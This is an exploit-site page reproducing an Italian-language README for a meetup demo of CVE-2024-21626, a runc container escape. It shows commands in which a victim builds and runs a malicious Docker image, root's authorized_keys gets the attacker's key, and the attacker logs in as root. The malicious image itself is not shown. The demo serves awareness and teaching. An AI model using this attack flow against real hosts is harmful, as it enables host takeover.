Sploitus

Exploit for CVE-2024-21626-demo

kitploit · 2026-08-26

Exploit Code

MARKDOWN86 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LAYSAKURA-CVE-2024-21626-DEMO
# CVE-2024-21626-demo

Demo per il LT del Container Runtime Meetup #5.

Scopo: diffondere la consapevolezza del pericolo di attacco secondo le informazioni pubbliche; l'abuso è severamente vietato.

## Slides

Container Runtime Meetup #5 〜Quella immagine, ti fidi davvero?〜 Ottenere la root dell'host con CVE-2024-21626

## Login su victim-server

Macchina registrata come `victim-server` nella ssh_config del laptop per la demo.

root@kitploit:~
    
    
    ssh victim-server
    

Informazioni sulla versione come prerequisito per essere vittima dell'attacco:

root@kitploit:~
    
    
    ubuntu@victim-server:$ docker --version
    Docker version 20.10.25+dfsg1, build b82b9f3
    
    ubuntu@victim-server:$ runc --version
    runc version 1.1.10+ds1
    commit: 1.1.10+ds1-1
    spec: 1.1.0
    go: go1.21.3
    libseccomp: 2.5.4
    

## Login su attacker-server

Analogamente

root@kitploit:~
    
    
    ssh attacker-server
    

## Scenario

### 1\. [victim-server] Recupero, build ed esecuzione accidentali di un'immagine Docker maliziosa

root@kitploit:~
    
    
    ubuntu@victim-server:~$ git clone some-email@example.com:laysakura/CVE-2024-21626-demo.git
    ubuntu@victim-server:~$ cd CVE-2024-21626-demo/
    ubuntu@victim-server:~/CVE-2024-21626-demo$ docker build -t myimage .
    ubuntu@victim-server:~/CVE-2024-21626-demo$ docker run -it myimage
    

### 2\. [victim-server] `/root/.ssh/authorized_keys` viene sovrascritto con la chiave pubblica dell'attaccante, senza che ce ne si accorga

Qui non si fa nulla perché non è intenzionale, ma si mostrano i comandi per verificare la situazione.

root@kitploit:~
    
    
    ubuntu@victim-server:~$ sudo cat /root/.ssh/authorized_keys
    ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKPHHGSytV6bL1ryaEKE9XNWN23piXdzsI3Rzxe20IF6 ubuntu@attacker-server
    

### 3\. [attacker-server] Login come root su victim-server

root@kitploit:~
    
    
    attacker@attacker-server:~$ ssh -i .ssh/id_ed25519 root@victim-server
    
    root@victim-server:~# id
    uid=0(root) gid=0(root) groups=0(root)
    

## References

  * https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv
  * https://github.com/NitroCao/CVE-2024-21626